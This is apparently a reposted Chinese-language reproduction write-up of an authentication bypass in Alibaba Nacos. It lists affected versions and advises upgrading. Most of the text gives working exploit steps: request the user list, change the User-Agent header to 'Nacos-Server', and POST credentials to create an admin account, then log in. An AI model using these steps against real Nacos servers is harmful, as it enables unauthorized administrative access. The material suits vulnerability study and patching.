簡介：

Nacos 致力於幫助您發現、配置和管理微服務。Nacos 提供了一組簡單易用的特性集，幫助您快速實現動態服務發現、服務配置、服務元數據及流量管理。

漏洞概述：

Nacos官方在github發布的issue中披露Alibaba Nacos 存在一個由於不當處理User-Agent導致的認證繞過漏洞。通過該漏洞，攻擊者可以進行任意操作，包括創建新用戶並進行登錄后操作。

1、在url處添加訪問一下網址即可查看到用戶列表
/nacos/v1/auth/users?pageNo=1&pageSize=10

2、訪問以下鏈接並使用burp抓包，然后把get請求改為post，把修改User-Agent頭改為Nacos-Server
http://your-ip:8848/nacos/v1/auth/users

3、構造數據包添加一個admin用戶，然后發送POST請求，返回為200，表示創建用戶成功
username=admin&password=admin

4、回到登錄界面，使用添加的賬號密碼進行登錄，可以看到登錄成功

Nacos <= 2.0.0-ALPHA.1

升級到最新版本的 Nacos

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Nacos 權限認證繞過漏洞復現 shiro < 1.6.0的認證繞過漏洞分析(CVE-2020-13933) Nuxeo 認證繞過和RCE漏洞分析（CVE-2018-16341) Mysql 身份認證繞過漏洞（CVE-2012-2122） Mysql 身份認證繞過漏洞（CVE-2012-2122） CVE-2020-14750 WebLogic權限繞過漏洞復現 Nacos 認證繞過 Linux sudo權限提升漏洞（CVE-2021-3156） Linux sudo權限提升漏洞（CVE-2021-3156）復現 [權限提升] CVE-2021-3156 Linux sudo 漏洞復現